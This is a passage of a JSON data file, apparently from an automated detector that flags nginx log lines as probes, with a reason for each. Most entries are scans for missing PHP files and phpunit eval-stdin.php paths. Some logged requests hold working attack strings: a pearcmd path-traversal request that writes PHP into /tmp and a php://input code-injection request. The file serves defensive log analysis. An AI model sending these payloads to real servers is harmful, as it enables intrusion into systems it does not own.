\"\u003cVAR\u003e\" 404 2401 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-19T22:33:22.361691254Z" }, "f5e61271e37ad2e56624a5fbb1fb591283d3237639995b60ce2b4ebe0260059b": { "type": "hash", "value": "f5e61271e37ad2e56624a5fbb1fb591283d3237639995b60ce2b4ebe0260059b", "source": "auto", "reason": "Attempted local file access and PHP code injection via crafted request to index.php with path traversal parameters", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/index.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd\u0026+config-create+/\u0026/\u003c?echo(md5(\"hi\"));?\u003e+/tmp/index1.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:49:07.446402749Z" }, "fe35d21bed6114b44dee7b4492abb0fc796a77547cc3a706b9eb43a66e85265d": { "type": "hash", "value": "fe35d21bed6114b44dee7b4492abb0fc796a77547cc3a706b9eb43a66e85265d", "source": "auto", "reason": "Detected a likely path traversal attempt in the request parameter (../../../../../../../../tmp/index1) targeting index.php, which is a common attacker technique to access restricted files.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/index.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:49:11.169097619Z" } } }, "alert": { "hashes": { "016e51d16139f6f895d9f6be915c4d6c0ab0027eddacbfa07e04b2097a085b0f": { "type": "hash", "value": "016e51d16139f6f895d9f6be915c4d6c0ab0027eddacbfa07e04b2097a085b0f", "source": "auto", "reason": "External request to a PHP file that does not exist; indicative of probing for vulnerable scripts or misconfigured paths.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/drhunthq.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /drhunthq.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:08:26.749704547Z" }, "01af0f47fd69f228fb73635cb8dd8223d54797aed419885a25ef5649d6dbece8": { "type": "hash", "value": "01af0f47fd69f228fb73635cb8dd8223d54797aed419885a25ef5649d6dbece8", "source": "auto", "reason": "An error log showing an attempt to access /api/backup resulted in No such file or directory. This could indicate probing for sensitive endpoints or misconfiguration; not definitive attack but warrants scrutiny.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/api/backup\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /api/backup HTTP/1.1\", host: \"54.200.221.0\"", "created_at": "2026-03-20T03:51:24.809502379Z" }, "03f8e3c8cf6c848c72fa206f04798348396fa898f5921850fcd135636557d128": { "type": "hash", "value": "03f8e3c8cf6c848c72fa206f04798348396fa898f5921850fcd135636557d128", "source": "auto", "reason": "Nginx error shows an open() failed for a PHP file under default site, which can indicate probing for accessible PHP files or misconfigurations. Not clearly malicious by itself, but warrants attention.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/gfd.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /gfd.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:08:47.699497664Z" }, "06c7a14ce39f077734efefefaaf7491cabd565eb80e6d2595b1947e113982cb2": { "type": "hash", "value": "06c7a14ce39f077734efefefaaf7491cabd565eb80e6d2595b1947e113982cb2", "source": "auto", "reason": "Request appears to target a phpunit path that is commonly exploited to locate sensitive test infrastructure; the error shows a missing file, which may indicate probing or attempted access to restricted resources.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:47:50.260648977Z" }, "06e2613d3e569d00c3d189e5fff7028c7f7deef963d8dcca1759685ade9ea433": { "type": "hash", "value": "06e2613d3e569d00c3d189e5fff7028c7f7deef963d8dcca1759685ade9ea433", "source": "auto", "reason": "Access to a phpunit path (eval-stdin.php) that typically should not exist on a public web root; could indicate probing for PHP unit framework or misconfiguration.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:46:42.033124344Z" }, "081041797615102972e588dbefcbe5d9f6ece1c43c425bde00c07c84065b2ca8": { "type": "hash", "value": "081041797615102972e588dbefcbe5d9f6ece1c43c425bde00c07c84065b2ca8", "source": "auto", "reason": "Attempt to access bolt.php resulting in file not found; could indicate probing for PHP endpoints or misconfigured paths.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/bolt.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /bolt.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:05:18.479970055Z" }, "09def7e4a8150f43687d71a2ac3db709a7664cf619bb4f9e50841270dd9c674c": { "type": "hash", "value": "09def7e4a8150f43687d71a2ac3db709a7664cf619bb4f9e50841270dd9c674c", "source": "auto", "reason": "An nginx error showing a missing file, with an unusual requested path (/ioxi.php). Could indicate probing or misconfiguration.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ioxi.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ioxi.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T13:59:35.602066014Z" }, "0b15514543ddb78be16853ca45d8d445b63a65e35c8985d7d3224c095f0948f7": { "type": "hash", "value": "0b15514543ddb78be16853ca45d8d445b63a65e35c8985d7d3224c095f0948f7", "source": "auto", "reason": "Nginx open() error shows missing file ws86.php being requested, which could indicate probing or misconfiguration. Not clearly malicious but warrants monitoring.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ws86.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ws86.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:00:23.397600305Z" }, "0c733b3c7ccd0c59b9304611031b39fe998fc9305b24498eeeb2ed1f08d3e767": { "type": "hash", "value": "0c733b3c7ccd0c59b9304611031b39fe998fc9305b24498eeeb2ed1f08d3e767", "source": "auto", "reason": "Access to kj.php resulted in a missing file error, which is a common probe target for web shells or malicious access attempts. Not definitively malicious on its own, but warrants attention.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/kj.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /kj.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:03:44.803864205Z" }, "0cffca398fff8ba922e5ec2cb88075833b59e3a723686b281fc3d89ea6b1cd2a": { "type": "hash", "value": "0cffca398fff8ba922e5ec2cb88075833b59e3a723686b281fc3d89ea6b1cd2a", "source": "auto", "reason": "Access attempt to a known phpunit path may indicate probing for local code execution vulnerabilities.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:48:12.684276689Z" }, "0fbf78418c687a0a701777c6490d39c9eeafe9964c7732d79311d810968f7463": { "type": "hash", "value": "0fbf78418c687a0a701777c6490d39c9eeafe9964c7732d79311d810968f7463", "source": "auto", "reason": "Access to a non-existent file (hehe.php) via nginx may indicate probing for sensitive scripts.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/hehe.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /hehe.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:01:30.210362565Z" }, "114e7b48344958019a598c059aef356c163238de6a8ede9cf6dc555f14318de4": { "type": "hash", "value": "114e7b48344958019a598c059aef356c163238de6a8ede9cf6dc555f14318de4", "source": "auto", "reason": "Access to CGI script login.cgi in /cgi-bin may indicate probing for vulnerable CGI endpoints; the file missing indicates potential exploratory behavior rather than a legitimate request.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/cgi-bin/login.cgi\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /cgi-bin/login.cgi HTTP/1.1\", host: \"54.200.221.0\"", "created_at": "2026-03-20T09:19:30.68571876Z" }, "11c039c986adca057747c3c83a7ff05108b852444d647d8f9533e2d9f0e5d6cd": { "type": "hash", "value": "11c039c986adca057747c3c83a7ff05108b852444d647d8f9533e2d9f0e5d6cd", "source": "auto", "reason": "Access to a likely malicious PHP file (sa.php7) and failed open suggests probing for PHP scripts or misconfigurations. Typical in web server reconnaissance and PHP-targeted exploits.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/sa.php7\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /sa.php7 HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:04:10.255256231Z" }, "12b745f15244d4d446e4d8024671cbdd66eb26d1662064fd1183483df0d26399": { "type": "hash", "value": "12b745f15244d4d446e4d8024671cbdd66eb26d1662064fd1183483df0d26399", "source": "auto", "reason": "HTTP 400 on root path from an unusual client string and highly variable user-agent indicates a possible probe or malformed request pattern typical of scanners.", "original_line": "\"54.200.221.0\" \"\u003cVAR\u003e\" 400 248 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T05:25:15.218032741Z" }, "12fd1fe50a8362ec40a524ef67c7d7681897d4ce814dc0607f8f108f13a200ae": { "type": "hash", "value": "12fd1fe50a8362ec40a524ef67c7d7681897d4ce814dc0607f8f108f13a200ae", "source": "auto", "reason": "Request for a PHP file that does not exist may indicate probing or attempted exploitation", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/8xyz.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /8xyz.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T13:59:21.4643487Z" }, "1488cc2c41b6a54c6afb743e80a0852699015a0bc8d6a106f50f634ebdd868c8": { "type": "hash", "value": "1488cc2c41b6a54c6afb743e80a0852699015a0bc8d6a106f50f634ebdd868c8", "source": "auto", "reason": "Access to a phpunit utility path under webroot is a common probe for PHP testing frameworks; indicates potential vulnerability probing or misconfiguration.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:46:50.672475012Z" }, "1511a12bdd4f17cb3557c4934f91d40b4d7687649cfeba22db3c12392d5c84da": { "type": "hash", "value": "1511a12bdd4f17cb3557c4934f91d40b4d7687649cfeba22db3c12392d5c84da", "source": "auto", "reason": "Attempted access to a PHP unit test file (eval-stdin.php) under the cms/vendor/phpunit path suggests probing for phpunit exploit vectors; common in automated vulnerability scans.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:47:54.401133918Z" }, "160a31dcae80951146ad09162dad044f066ba30ea4b56e0c29054af0b4a94250": { "type": "hash", "value": "160a31dcae80951146ad09162dad044f066ba30ea4b56e0c29054af0b4a94250", "source": "auto", "reason": "Log shows an nginx error about a missing file and a request containing php://input and allow_url_include indicators, which are common in attempted PHP code injection/path traversal attacks.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/hello.world\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:45:08.359660123Z" }, "17acdb6866c15361cea69077b153de1b48b9f9897596c976595789dc14e9af1d": { "type": "hash", "value": "17acdb6866c15361cea69077b153de1b48b9f9897596c976595789dc14e9af1d", "source": "auto", "reason": "Requested file vx.php under /public/ likely to probe for vulnerable PHP file; file not found but could indicate attempted exploitation", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/public/vx.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /public/vx.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:02:59.550341888Z" }, "18135aaf45132fce373550891b089da3d51f771d351139735f21e65e6dc30118": { "type": "hash", "value": "18135aaf45132fce373550891b089da3d51f771d351139735f21e65e6dc30118", "source": "auto", "reason": "Request to /.env may indicate probing for sensitive environment configuration.", "original_line": "\"media.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 1309 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T05:21:56.978475162Z" }, "187727c001963ed6125df36382090def57040fad4865cb7902a4058231959a51": { "type": "hash", "value": "187727c001963ed6125df36382090def57040fad4865cb7902a4058231959a51", "source": "auto", "reason": "HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat.", "original_line": "\"54.200.221.0\" \"\u003cVAR\u003e\" 405 552 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T01:32:03.422273833Z" }, "18a2abf42b3ffaabc59ad3ecbf2f4fe64259c84eebf32e73ff7715283a228d65": { "type": "hash", "value": "18a2abf42b3ffaabc59ad3ecbf2f4fe64259c84eebf32e73ff7715283a228d65", "source": "auto", "reason": "Web request returns HTTP 405 (method not allowed) to an unexpected endpoint (POST /) from an external client; could be probing or misconfigured client, not definitively malicious.", "original_line": "\"test3.admin.kovicloud.com\" \"\u003cVAR\u003e\" 405 552 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-19T22:36:36.100575977Z" }, "1b0eb062749e05f2a49a972cfd5771c9d4b32316cf8c2440640ee5c029d811b6": { "type": "hash", "value": "1b0eb062749e05f2a49a972cfd5771c9d4b32316cf8c2440640ee5c029d811b6", "source": "auto", "reason": "Requested non-existent WP file under wp-admin path; potential probing for WordPress admin resources", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/wp-admin/css/bolt.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /wp-admin/css/bolt.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:05:36.887898108Z" }, "1f2acc771ef31a9459ebf0fbe90ff8628216577641cb2233edaae8b1615dfa1c": { "type": "hash", "value": "1f2acc771ef31a9459ebf0fbe90ff8628216577641cb2233edaae8b1615dfa1c", "source": "auto", "reason": "Access to phpunit path suggests probing for vulnerable phpunit files; could be reconnaissance or attempted exploit", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/phpunit/phpunit/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:46:00.758900987Z" }, "1fca3f1a0a347e43a35eeaa622d8e385067fac022beed48e293b798028f3ab98": { "type": "hash", "value": "1fca3f1a0a347e43a35eeaa622d8e385067fac022beed48e293b798028f3ab98", "source": "auto", "reason": "HTTP error for a PHP file that may be part of an automated probe; could indicate and attempt to discover exposed files. Not definitive malware but warrants monitoring.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/hplfuns.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /hplfuns.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:06:01.34658195Z" }, "1ff88d275d5f459c6a091c4d1c5b83df5d1189ad9c88117f7cd0d7f0c845aa5c": { "type": "hash", "value": "1ff88d275d5f459c6a091c4d1c5b83df5d1189ad9c88117f7cd0d7f0c845aa5c", "source": "auto", "reason": "GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.", "original_line": "\"api.admin.kovicloud.com\" \"\u003cVAR\u003e\" 404 146 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T00:00:14.721702713Z" }, "27e9b25b999a74c84b8812fa77aa79b5128bfdb86be77f12fa7379f353f87448": { "type": "hash", "value": "27e9b25b999a74c84b8812fa77aa79b5128bfdb86be77f12fa7379f353f87448", "source": "auto", "reason": "Error shows an access attempt to a phpunit php file path which is a common probe for PHP code execution or vulnerability scanning. The request failed with file not found, but this pattern is unusual and warrants monitoring.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:46:18.057597406Z" }, "287d31a72dd683168eb9ba7f9e397c3b95dcfcdc9c9484f980cb596d181a9f0c": { "type": "hash", "value": "287d31a72dd683168eb9ba7f9e397c3b95dcfcdc9c9484f980cb596d181a9f0c", "source": "auto", "reason": "Probe-like request targeting phpunit path (eval-stdin.php) suggests attempted exploitation or vulnerability scanning.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:47:37.617425499Z" }, "2af461f2bdc5810731a1f8acdf1b3694c480139f79b01e97ddf9065331fa64f7": { "type": "hash", "value": "2af461f2bdc5810731a1f8acdf1b3694c480139f79b01e97ddf9065331fa64f7", "source": "auto", "reason": "An HTTP GET for a php file (nc4.php) resulting in an open() file-not-found error suggests probing for exposed PHP scripts; could indicate an attempted file access or vulnerability scan.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/nc4.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /nc4.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T13:59:43.054725593Z" }, "2b03c10b89c5b32600c60202f9ab7d9d50d9de67b96df1c69d113d6ef43f8599": { "type": "hash", "value": "2b03c10b89c5b32600c60202f9ab7d9d50d9de67b96df1c69d113d6ef43f8599", "source": "auto", "reason": "An error indicating a missing PHP file being requested (possible probing for web resources). Not confirmed malicious, but warrants attention.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ws84.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ws84.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:02:54.69499354Z" }, "2b0cc3f4ae3d6f8e0b968218a0955933fa12487326b15adad8ebd86f3c58312b": { "type": "hash", "value": "2b0cc3f4ae3d6f8e0b968218a0955933fa12487326b15adad8ebd86f3c58312b", "source": "auto", "reason": "An nginx error shows an attempt to access a PHP unit test file (phpunit) which is uncommon in normal traffic and could indicate probing for test artifacts.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:48:24.935968059Z" }, "2f3a698141d2cdd79605a177134f69597d0df747e4f9b1c0f07293f042f85116": { "type": "hash", "value": "2f3a698141d2cdd79605a177134f69597d0df747e4f9b1c0f07293f042f85116", "source": "auto", "reason": "Access to a potentially mis-typed file (/hots.php) on an error path; probes for PHP files can indicate reconnaissance or misconfiguration attempts.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/hots.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /hots.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:03:34.620487646Z" }, "2f4887992b5dd61174a8bcb7f6d19ef9628432b16f4463ca0fccd4cd216ca6ae": { "type": "hash", "value": "2f4887992b5dd61174a8bcb7f6d19ef9628432b16f4463ca0fccd4cd216ca6ae", "source": "auto", "reason": "Access to gifclass.php is commonly probed for web shells or vulnerable PHP scripts; file not found indicates an unsuccessful probe but pattern resembles automated scanning.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/gifclass.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /gifclass.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:01:03.711267554Z" }, "3081f0b20949184b758eed7f355f1b3cbce6d696f7fb6588b997e75d14fad1c2": { "type": "hash", "value": "3081f0b20949184b758eed7f355f1b3cbce6d696f7fb6588b997e75d14fad1c2", "source": "auto", "reason": "Root cause: request to non-existent PHP file (inege.php) in default nginx directory. Could indicate probing or misconfiguration; enriched error shows unusual path name suggesting potential automated scanning.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/inege.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /inege.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:09:39.756442084Z" }, "327e5fa05fdef3d627a56e94e09e5750f61580c9da0df1e51b0ac79c58aa7d83": { "type": "hash", "value": "327e5fa05fdef3d627a56e94e09e5750f61580c9da0df1e51b0ac79c58aa7d83", "source": "auto", "reason": "Error indicates a missing file being requested (ws78.php), which can be part of probing or misconfiguration but is not a confirmed attack.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ws78.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ws78.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:00:00.046631225Z" }, "352ab01332813268d7727fe7e1675668db310c477340019ba49127cdeef917a8": { "type": "hash", "value": "352ab01332813268d7727fe7e1675668db310c477340019ba49127cdeef917a8", "source": "auto", "reason": "An access to a PHP unit testing file under V2/vendor/phpunit was attempted, which is a common probe for PHP unit exposure; module open() failure indicates missing file but the path suggests an attempted exploit vector.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:47:25.618204272Z" }, "35e69cc408d4ec03751217721b9b42a94b74bef8eed59da8afcb02bf638e85c9": { "type": "hash", "value": "35e69cc408d4ec03751217721b9b42a94b74bef8eed59da8afcb02bf638e85c9", "source": "auto", "reason": "An attempt to access the version endpoint resulting in a file-not-found error. Could indicate probing for version information or misconfiguration; not definitive malicious activity but warrants scrutiny.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/version\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /version HTTP/1.1\", host: \"54.200.221.0\"", "created_at": "2026-03-20T07:46:26.967150403Z" }, "370c20ff5a57e44b89aab6c263a0d42cb2f76611333f39cb217e80bdb095aa3e": { "type": "hash", "value": "370c20ff5a57e44b89aab6c263a0d42cb2f76611333f39cb217e80bdb095aa3e", "source": "auto", "reason": "Accessing a PHP file that does not exist (wp-p2r3q9c8k4.php) can indicate probing or misconfigured routing. Not definitive compromise, but warrants attention.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/wp-p2r3q9c8k4.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /wp-p2r3q9c8k4.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:09:30.737128551Z" }, "3834b35f292bb000840814a7be6adb5cb4cee6bf30e7fa5f64235cb8213afcd4": { "type": "hash", "value": "3834b35f292bb000840814a7be6adb5cb4cee6bf30e7fa5f64235cb8213afcd4", "source": "auto", "reason": "Unusual error log showing a request to vx.php leading to a missing file, indicative of probing or misconfiguration", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/vx.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /vx.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:05:01.871623695Z" }, "3903b1398bfd448810f942679798111847ab80cda28740ae4f1f922c73dcc698": { "type": "hash", "value": "3903b1398bfd448810f942679798111847ab80cda28740ae4f1f922c73dcc698", "source": "auto", "reason": "Attempted access to phpunit eval-stdin.php path which is a common probe for RCE/LFI or misconfiguration exposure", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:45:50.369638113Z" }, "3a78465a779e8b17ebfd420c5c9eb6c1d09e9a8ea44fed2210704bd6ae67d814": { "type": "hash", "value": "3a78465a779e8b17ebfd420c5c9eb6c1d09e9a8ea44fed2210704bd6ae67d814", "source": "auto", "reason": "An nginx error line indicating a missing file for a request (GET /ws75.php). This could be normal for missing resources but may indicate probing or misconfiguration.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ws75.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ws75.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T13:59:52.859983617Z" }, "3b642bf8fd79fdc68f225b83df68168490e79fd43020434847becc71898b8446": { "type": "hash", "value": "3b642bf8fd79fdc68f225b83df68168490e79fd43020434847becc71898b8446", "source": "auto", "reason": "An nginx open() failed with a missing file error, which can indicate misconfiguration, missing resources, or probing. Not definitively malicious but warrants review.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/mcp\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"POST /mcp HTTP/2.0\", host: \"54.200.221.0\"", "created_at": "2026-03-20T07:02:39.005194665Z" }, "3d72e461640189e5f5e9abde7f02cfb8730d15178aa6ff3f2313282369b775b9": { "type": "hash", "value": "3d72e461640189e5f5e9abde7f02cfb8730d15178aa6ff3f2313282369b775b9", "source": "auto", "reason": "Attempt to access a PHP admin footer file that does not exist; could indicate probing for sensitive files or misconfiguration.", 